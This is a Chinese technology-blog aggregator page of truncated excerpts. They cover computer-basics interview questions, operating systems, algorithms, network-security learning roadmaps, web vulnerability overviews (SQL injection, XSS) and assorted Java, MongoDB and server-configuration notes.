    1.数组和链表的区别是什么?各自的优缺点是什么?专业解答:数组内存连续,支持随机访问,但插入删除效率低;链表内存离散,插入删除高效,但访问需遍历。初中生版:数组像排座位,按编号找人快,但中间加人麻烦;链表像自由组队,拉人容易,但找人得挨个问。2.什么是哈希表?如何解决哈希冲突?专业解答:哈希表通过键值映射实现快速存取。冲突解决方法:开放寻址法(找下一个空位)、链地址法(拉链表)。初中生版:哈希表像
  • 计算机基础之操作系统——进程与线程管理(三) 查理养殖场 计算机八股服务器linux
    1、多进程与多线程怎么选择?多进程资源隔离性好、安全性高、支持并行,然而资源需求高、进程间通信复杂、上下文切换开销大;多线程轻量级、高度共享资源和数据、线程间通信简单、资源占用低、上下文切换开销小,然而隔离性差,容错性差。应用场景多进程:如果应用需要独立的地址空间和资源,或者需要在不同的安全上下文中运行,那么多进程可能是更好的选择。多线程:如果应用需要高度共享数据和资源,或者需要轻量级的任务并发,
  • 华为codecraft算法大赛---寻路 我曾经被山河大海跨过 数据结构与算法数据结构DFScodecraft算法
    华为codecraft算法大赛—寻路前言最近实验室的师兄师姐们在热火朝天的笔试(都说难难难),我也要了些题来感受了一下,已然被虐的体无完肤。选择题考的内容涉及范围广,算法编程题对于没有刷题经验的我来说就更是难上加难了。看来有必要在学习工作之余学习学习算法以及计算机基础知识了。翻了上半年参加华为codecraft算法大赛的代码,趁周末整理一下当时的思路以及回顾一下数据结构与算法。比赛前中期还保持不错
  • 不要再走弯路了2025最全的黑客入门学习路线在这 渗透代老师 学习网络安全安全网络web安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包在大多数的思维里总觉得[学习]得先收集资料、学习编程、学习计算机基础,这样不是不可以,但是这样学效率太低了!你要知道网络安全是一门技术,任何技术的学习一定是以实践为主的。也就是说很多的理论知识其实是可以在实践中去验证拓展的,这样学习比起你啃原理、啃书本要好理解很多。所以想要学习网络安全选对正确的学习方法很重要,这可以帮你少走很多弯路。
  • 计算机基础之操作系统——进程与线程管理(一) 查理养殖场 计算机八股linux
    1、进程、线程、协程区别与联系?进程、线程和协程是计算机程序执行的三个不同层次。进程(Process):定义:进程是操作系统进行资源分配和调度的基本单位,每个进程都有自己的内存空间、系统资源和程序计数器。特点:进程间相互独立。每个进程有自己的地址空间,无法直接访问其他进程的数据。进程之间的资源是相互隔离的,进程之间的通信需要通过进程间通信(IPC)机制,如管道、消息队列、共享内存等。开销较大,因为
  • 四川专升本40天逆袭计划(热血硬核版)[特殊字符] 我的青春不太冷 学习专升本物联网应用技术专科
    你会感谢努力过的自己牛马版本舒缓版本牛马版本四川专升本40天逆袭计划(知乎硬核版)写在前面:40天够不够?老子告诉你:够!但得玩命!每天睡6小时,学12小时,最后10天你会感谢现在拼命的自己。(ps:物联网专业的兄弟,计算机基础给劳资冲满分!)一、战略总纲(理工科版)核心战术:✅保计算机冲140,数学死磕基础题,英语作文模板救命✅每天3科雨露均沾,但计算机优先提分!✅最后10天全真模拟,考试当日常
  • 2024字节总监最新总结:240道算法LeetCode刷题笔记(大厂面试必备) 2401_84048179 程序员算法leetcode笔记
    据了解很多大厂技术面试的要求是:技术要好,计算机基础扎实,熟练掌握算法和数据结构,语言不重要,熟练度很重要。每一轮技术面试都可能考代码,不只考算法,但一定会考算法。为什么大厂都在面试算法?============这里我们引入一位美团面试官的看法美团资深工程师Windy:通过算法面试题的考察,我希望候选人不光可以展示编程能力,还可以通过详细了解题目,展示自己的沟通能力和推演能力(如何构建题目的思路)
  • 网络安全竞赛学习路线及建议 星光网络安全社 规划web安全学习安全网络安全
    参加网络安全竞赛(如CTF、攻防赛等)需要掌握广泛的知识和技能。以下是我所整理的网络安全竞赛的学习内容,涵盖基础知识、进阶技能和实战训练。(ps:参加竞赛与就业侧重点不同,竞赛主要是精细化、模块化的专项训练)一、基础知识1.计算机基础操作系统:Linux(常用命令、文件系统、权限管理)、Windows(注册表、服务管理)计算机网络:TCP/IP协议、HTTP/HTTPS、DNS、ARP、路由与交换
  • 2024年03月CCF-GESP编程能力等级认证Python编程四级真题解析 码农StayUp pythonCCFGESP青少年编程
    本文收录于专栏《Python等级认证CCF-GESP真题解析》,专栏总目录:点这里,订阅后可阅读专栏内所有文章。一、单选题(共15题,共30分)第1题小杨的父母最近刚刚给他买了一块华为手表,他说手表上跑的是鸿蒙,这个鸿蒙是.()A.小程序B.计时器C.操作系统D.神话人物答案:C本题属于考察计算机基础知识。鸿蒙是操作系统,操作系统是管理计算机硬件与软件资源的程序,同时也是计算机系统的内核与基石。它
  • 网络安全(黑客)——自学2024 白帽子黑客-宝哥 web安全安全嵌入式硬件网络单片机
    一、什么是网络安全网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、网络安全怎么入门安全并非孤立存在,而是建立在其计算机基础之上的应用技术。
  • 计算机基础设计,计算机基础知识教学设计 洛斯里克甜面包 计算机基础设计
    《计算机基础知识教学设计》由会员分享,可在线阅读,更多相关《计算机基础知识教学设计(5页珍藏版)》请在人人文库网上搜索。1、教学设计(教案)基本信息学科计算机基础知识年级2012级教学形式多媒体教师兰竹单位达州中医学校课题名称认识计算机学情分析分析要点:1.教师主观分析、师生访谈、学生作业或试题分析反馈、问卷调查等;2.学生认知发展分析:主要分析学生现在的认知基础(包括知识基础和能力基础),要形成
  • Prolog语言的计算机基础 厉君韵 包罗万象golang开发语言后端
    Prolog语言的计算机基础引言在计算机科学的浩瀚海洋中,编程语言犹如繁星般璀璨。其中,Prolog(ProgramminginLogic)作为一种独特的编程语言,凭借其独特的逻辑编程范式,吸引了众多学者与开发者的关注。Prolog最早在20世纪70年代被提出,旨在提供一种用于符号处理和知识表示的强大工具。本篇文章将深入探讨Prolog语言的计算机基础,涵盖其历史背景、基本概念、核心语法、应用领域
  • 计算机网络基础知识自考,自考“计算机网络基本原理”考试大纲 曹阳明 计算机网络基础知识自考
    -、课程的性质及其设置的目的与要求(-)课程的性质、地位与任务计算机网络基本原理是高等教育自学考试计算机网络专业(独立本科段)考试计划中的一门专业基础课。通过本课程的学习,使应考者能够在己有的计算机基础知识、计算机原理及通信基础等基础上,对网络技术有一个系统的、全面的了解;理解和掌握网络技术的基本知识、基本理论和网络基本工作原理,为深人学习网络专业课程和深人理解、掌握网络技术打下良好的基础;在系统
  • 从小白到黑客高手:一份全面详细的学习路线指南 QXXXD 学习web安全运维安全arm开发数据库
    前言黑客从入门到精通需要经过深入的学习和实践,这是一个需要长时间投入和大量精力的过程。在这份学习路线中,我将为你介绍黑客学习的基本知识和技能,帮助你逐步掌握黑客技能。黑客一、入门阶段1.了解计算机基础知识学习计算机基础知识,如操作系统、计算机网络、数据结构等。这些知识对于学习黑客技术非常重要,因为黑客技术都是基于计算机基础知识进行开发的。2.学习编程语言学习编程语言,如Python、C、Java等
  • Java学习笔记系列-基础篇-标识符与关键字 klsstt Java学习笔记系列Javajava
    Java学习笔记Java学习笔记是一个持续更新的系列,工作多年,抽个空对自身知识做一个梳理和总结归纳,温故而知新,同时也希望能帮助到更多正在学习Java的同学们。本系列目录入门篇计算机基础计算机编程语言面向对象的编程思想基础篇环境搭建第一个Java程序开发工具Java中的注释标识符与关键字标识符用于给Java程序中变量、类、方法等命名的符号,也就是说凡是由我们自己起名的地方都可以称为标识符。例如:
  • 【学术投稿-2025年计算机视觉研究进展与应用国际学术会议 (ACVRA 2025)】从计算机基础到HTML开发:Web开发的第一步 禁默 前端前端html计算机视觉
    会议官网:www.acvra.org简介2025年计算机视觉研究进展与应用(ACVRA2025)将于2025年2月28-3月2日在中国广州召开,将汇聚世界各地的顶尖学者、研究人员和行业专家,聚焦计算机视觉领域的最新研究动态与应用成就。本次会议将探讨前沿技术,包括深度学习、多模态学习、图像和视频分析、3D重建等,以及其在智能交通、医疗影像、增强现实和自动化等多个实际应用中的创新转化。著名专家进行特邀
  • SaaS架构详解 Rainbow酱 架构sasspaas
    SaaS架构详解架构图IaaS层定义基础设施即服务(Infrastructure-as-a-Service),指把IT基础设施作为一种服务通过网络对外提供,并根据用户对资源的实际使用量或占用量进行计费的一种服务模式。作用在这种服务模型中,普通用户不用自己构建一个数据中心等硬件设施,而是通过租用的方式,利用Internet从IaaS服务提供商获得计算机基础设施服务,包括服务器、存储和网络等服务。内容
  • 【程序猿面试题——计算机基础知识和编程】TCP和UDP的差异是什么? 努力学习的大大 计算机基础知识和编程tcp/ipudp网络协议c++
    【程序猿面试题——计算机基础知识和编程】TCP和UDP的差异是什么?【程序猿面试题——计算机基础知识和编程】TCP和UDP的差异是什么?文章目录【程序猿面试题——计算机基础知识和编程】TCP和UDP的差异是什么?前言1.连接方式2.可靠性3.传输速度4.流量控制和拥塞控制5.数据包结构6.头部开销7.应用场景8.顺序保证9.使用的端口号总结表格总结第四届能源利用与自动化国际学术会议(ICEUA20
  • 计算机基础---HTTP缓存机制 淡写青春209 http缓存网络协议
    HTTP缓存机制一、HTTP/1.0的缓存机制If-Modified-Since:客户端在首次请求资源时,服务器会在响应头中返回资源的最后修改时间。后续客户端再次请求该资源时,会在请求头中带上If-Modified-Since,其值为上次服务器返回的资源最后修改时间。服务器接收到请求后,会比较资源的实际最后修改时间与If-Modified-Since的值。如果资源没有被修改,服务器返回304Not
  • iOS http封装 374016526 ios服务器交互http网络请求
    程序开发避免不了与服务器的交互,这里打包了一个自己写的http交互库。希望可以帮到大家。   内置一个basehttp,当我们创建自己的service可以继承实现。   KuroAppBaseHttp *baseHttp = [[KuroAppBaseHttp alloc] init]; [baseHttp setDelegate:self]; [baseHttp
  • lolcat :一个在 Linux 终端中输出彩虹特效的命令行工具 brotherlamp linuxlinux教程linux视频linux自学linux资料
      那些相信 Linux 命令行是单调无聊且没有任何乐趣的人们,你们错了,这里有一些有关 Linux 的文章,它们展示着 Linux 是如何的有趣和“淘气” 。 在本文中,我将讨论一个名为“lolcat”的小工具 – 它可以在终端中生成彩虹般的颜色。 何为 lolcat ? Lolcat 是一个针对 Linux,BSD 和 OSX 平台的工具,它类似于 cat 命令,并为 cat
  • MongoDB索引管理(1)——[九] eksliang mongodbMongoDB管理索引
    转载请出自出处:http://eksliang.iteye.com/blog/2178427 一、概述       数据库的索引与书籍的索引类似,有了索引就不需要翻转整本书。数据库的索引跟这个原理一样,首先在索引中找,在索引中找到条目以后,就可以直接跳转到目标文档的位置,从而使查询速度提高几个数据量级。       不使用索引的查询称
  • Informatica参数及变量 18289753290 Informatica参数变量
    下面是本人通俗的理解,如有不对之处,希望指正 info参数的设置:在info中用到的参数都在server的专门的配置文件中(最好以parma)结尾 下面的GLOBAl就是全局的,$开头的是系统级变量,$$开头的变量是自定义变量。如果是在session中或者mapping中用到的变量就是局部变量,那就把global换成对应的session或者mapping名字。 [GLOBAL] $Par
  • python 解析unicode字符串为utf8编码字符串 酷的飞上天空 unicode
    php返回的json字符串如果包含中文,则会被转换成\uxx格式的unicode编码字符串返回。 在浏览器中能正常识别这种编码,但是后台程序却不能识别,直接输出显示的是\uxx的字符,并未进行转码。   转换方式如下   >>> import json >>> q = '{"text":"\u4
  • Hibernate的总结 永夜-极光 Hibernate
    1.hibernate的作用,简化对数据库的编码,使开发人员不必再与复杂的sql语句打交道   做项目大部分都需要用JAVA来链接数据库,比如你要做一个会员注册的 页面,那么 获取到用户填写的 基本信后,你要把这些基本信息存入数据库对应的表中,不用hibernate还有mybatis之类的框架,都不用的话就得用JDBC,也就是JAVA自己的,用这个东西你要写很多的代码,比如保存注册信
  • SyntaxError: Non-UTF-8 code starting with '\xc4' 随便小屋 python
    刚开始看一下Python语言,传说听强大的,但我感觉还是没Java强吧! 写Hello World的时候就遇到一个问题,在Eclipse中写的,代码如下 ''' Created on 2014年10月27日 @author: Logic ''' print("Hello World!");  运行结果 SyntaxError: Non-UTF-8
  • 学会敬酒礼仪 不做酒席菜鸟 aijuans 菜鸟
    俗话说,酒是越喝越厚,但在酒桌上也有很多学问讲究,以下总结了一些酒桌上的你不得不注意的小细节。 细节一:领导相互喝完才轮到自己敬酒。敬酒一定要站起来,双手举杯。 细节二:可以多人敬一人,决不可一人敬多人,除非你是领导。 细节三:自己敬别人,如果不碰杯,自己喝多少可视乎情况而定,比如对方酒量,对方喝酒态度,切不可比对方喝得少,要知道是自己敬人。 细节四:自己敬别人,如果碰杯,一
  • 《创新者的基因》读书笔记 aoyouzi 读书笔记《创新者的基因》
    创新者的基因   创新者的“基因”,即最具创意的企业家具备的五种“发现技能”:联想,观察,实验,发问,建立人脉。   第一部分破坏性创新,从你开始 第一章破坏性创新者的基因 如何获得启示: 发现以下的因素起到了催化剂的作用:(1) -个挑战现状的问题;(2)对某项技术、某个公司或顾客的观察;(3) -次尝试新鲜事物的经验或实验;(4)与某人进行了一次交谈,为他点醒
  • 表单验证技术 百合不是茶 JavaScriptDOM对象String对象事件
    js最主要的功能就是验证表单,下面是我对表单验证的一些理解,贴出来与大家交流交流  ,数显我们要知道表单验证需要的技术点, String对象,事件,函数   一:String对象;通常是对字符串的操作;   1,String的属性;   字符串.length;表示该字符串的长度; var str= "java"
  • web.xml配置详解之context-param bijian1013 javaservletweb.xmlcontext-param
    一.格式定义: <context-param> <param-name>contextConfigLocation</param-name> <param-value>contextConfigLocationValue></param-value> </context-param> 作用:该元
  • Web系统常见编码漏洞(开发工程师知晓) Bill_chen sqlPHPWebfckeditor脚本
    1.头号大敌:SQL Injection 原因:程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果, 获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 本质: 对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。 示例: String query = "SELECT id FROM users
  • 【MongoDB学习笔记六】MongoDB修改器 bit1129 mongodb
    本文首先介绍下MongoDB的基本的增删改查操作,然后,详细介绍MongoDB提供的修改器,以完成各种各样的文档更新操作  MongoDB的主要操作 show dbs 显示当前用户能看到哪些数据库 use foobar 将数据库切换到foobar show collections 显示当前数据库有哪些集合 db.people.update,update不带参数,可
  • 提高职业素养,做好人生规划 白糖_ 人生
      培训讲师是成都著名的企业培训讲师,他在讲课中提出的一些观点很新颖,在此我收录了一些分享一下。注:讲师的观点不代表本人的观点,这些东西大家自己揣摩。   1、什么是职业规划:职业规划并不完全代表你到什么阶段要当什么官要拿多少钱,这些都只是梦想。职业规划是清楚的认识自己现在缺什么,这个阶段该学习什么,下个阶段缺什么,又应该怎么去规划学习,这样才算是规划。  
  • 国外的网站你都到哪边看? bozch 技术网站国外
    学习软件开发技术,如果没有什么英文基础,最好还是看国内的一些技术网站,例如:开源OSchina,csdn,iteye,51cto等等。 个人感觉如果英语基础能力不错的话,可以浏览国外的网站来进行软件技术基础的学习,例如java开发中常用的到的网站有apache.org 里面有apache的很多Projects,springframework.org是spring相关的项目网站,还有几个感觉不错的
  • 编程之美-光影切割问题 bylijinnan 编程之美
    package a; public class DisorderCount { /**《编程之美》“光影切割问题” * 主要是两个问题: * 1.数学公式(设定没有三条以上的直线交于同一点): * 两条直线最多一个交点,将平面分成了4个区域; * 三条直线最多三个交点,将平面分成了7个区域; * 可以推出:N条直线 M个交点,区域数为N+M+1。
  • 关于Web跨站执行脚本概念 chenbowen00 Web安全跨站执行脚本
    跨站脚本攻击(XSS)是web应用程序中最危险和最常见的安全漏洞之一。安全研究人员发现这个漏洞在最受欢迎的网站,包括谷歌、Facebook、亚马逊、PayPal,和许多其他网站。如果你看看bug赏金计划,大多数报告的问题属于 XSS。为了防止跨站脚本攻击,浏览器也有自己的过滤器,但安全研究人员总是想方设法绕过这些过滤器。这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。在
  • [开源项目与投资]投资开源项目之前需要统计该项目已有的用户数 comsci 开源项目
            现在国内和国外,特别是美国那边,突然出现很多开源项目,但是这些项目的用户有多少,有多少忠诚的粉丝,对于投资者来讲,完全是一个未知数,那么要投资开源项目,我们投资者必须准确无误的知道该项目的全部情况,包括项目发起人的情况,项目的维持时间..项目的技术水平,项目的参与者的势力,项目投入产出的效益.....
  • oracle alert log file(告警日志文件) daizj oracle告警日志文件alert log file
    The alert log is a chronological log of messages and errors, and includes the following items: All internal errors (ORA-00600), block corruption errors (ORA-01578), and deadlock errors (ORA-00060)
  • 关于 CAS SSO 文章声明 denger SSO
    由于几年前写了几篇 CAS 系列的文章,之后陆续有人参照文章去实现,可都遇到了各种问题,同时经常或多或少的收到不少人的求助。现在这时特此说明几点: 1.  那些文章发表于好几年前了,CAS 已经更新几个很多版本了,由于近年已经没有做该领域方面的事情,所有文章也没有持续更新。 2. 文章只是提供思路,尽管 CAS 版本已经发生变化,但原理和流程仍然一致。最重要的是明白原理,然后
  • 初二上学期难记单词 dcj3sjt126com englishword
    lesson 课 traffic 交通 matter 要紧;事物 happy 快乐的,幸福的 second 第二的 idea 主意;想法;意见 mean 意味着 important 重要的,重大的 never 从来,决不 afraid 害怕 的 fifth 第五的 hometown 故乡,家乡 discuss 讨论;议论 east 东方的 agree 同意;赞成 bo
  • uicollectionview 纯代码布局, 添加头部视图 dcj3sjt126com Collection
    #import <UIKit/UIKit.h> @interface myHeadView : UICollectionReusableView { UILabel *TitleLable; } -(void)setTextTitle; @end #import "myHeadView.h" @implementation m
  • N 位随机数字串的 JAVA 生成实现 FX夜归人 javaMath随机数Random
    /** * 功能描述 随机数工具类<br /> * @author FengXueYeGuiRen * 创建时间 2014-7-25<br /> */ public class RandomUtil { // 随机数生成器 private static java.util.Random random = new java.util.R
  • Ehcache(09)——缓存Web页面 234390216 ehcache页面缓存
    页面缓存 目录 1       SimplePageCachingFilter 1.1      calculateKey 1.2      可配置的初始化参数 1.2.1     cach
  • spring中少用的注解@primary解析 jackyrong primary
    这次看下spring中少见的注解@primary注解,例子 @Component public class MetalSinger implements Singer{ @Override public String sing(String lyrics) { return "I am singing with DIO voice
  • Java几款性能分析工具的对比 lbwahoo java
    Java几款性能分析工具的对比 摘自:http://my.oschina.net/liux/blog/51800   在给客户的应用程序维护的过程中,我注意到在高负载下的一些性能问题。理论上,增加对应用程序的负载会使性能等比率的下降。然而,我认为性能下降的比率远远高于负载的增加。我也发现,性能可以通过改变应用程序的逻辑来提升,甚至达到极限。为了更详细的了解这一点,我们需要做一些性能
  • JVM参数配置大全 nickys jvm应用服务器
    JVM参数配置大全 /usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=300M -XX:SurvivorRatio=8 -XX:MaxTenuringThreshold=5 -
  • 搭建 CentOS 6 服务器(14) - squid、Varnish rensanning varnish
    (一)squid 安装 # yum install httpd-tools -y # htpasswd -c -b /etc/squid/passwords squiduser 123456 # yum install squid -y 设置 # cp /etc/squid/squid.conf /etc/squid/squid.conf.bak # vi /etc/
  • Spring缓存注解@Cache使用 tom_seed spring
    参考资料 http://www.ibm.com/developerworks/cn/opensource/os-cn-spring-cache/ http://swiftlet.net/archives/774   缓存注解有以下三个: @Cacheable      @CacheEvict     @CachePut
  • dom4j解析XML时出现"java.lang.noclassdeffounderror: org/jaxen/jaxenexception"错误 xp9802
    java.lang.NoClassDefFoundError: org/jaxen/JaxenExc 关键字: java.lang.noclassdeffounderror: org/jaxen/jaxenexception 使用dom4j解析XML时,要快速获取某个节点的数据,使用XPath是个不错的方法,dom4j的快速手册里也建议使用这种方式 执行时却抛出以下异常: Exceptio
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他